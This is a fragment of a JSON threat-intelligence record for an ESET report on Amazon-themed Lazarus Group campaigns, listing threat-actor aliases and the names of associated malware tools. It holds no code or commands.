Retrieved from doi.org.\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 12 of 13\n\nSource: https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nhttps://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/"
	],
	"report_names": [
		"amazon-themed-campaigns-lazarus-netherlands-belgium"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434527,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4b8619effdbc24352c4c1a3d88459d130f2109bd.pdf",
		"text": "https://archive.orkl.eu/4b8619effdbc24352c4c1a3d88459d130f2109bd.txt",
		"img": "https://archive.orkl.eu/4b8619effdbc24352c4c1a3d88459d130f2109bd.jpg"
	}
}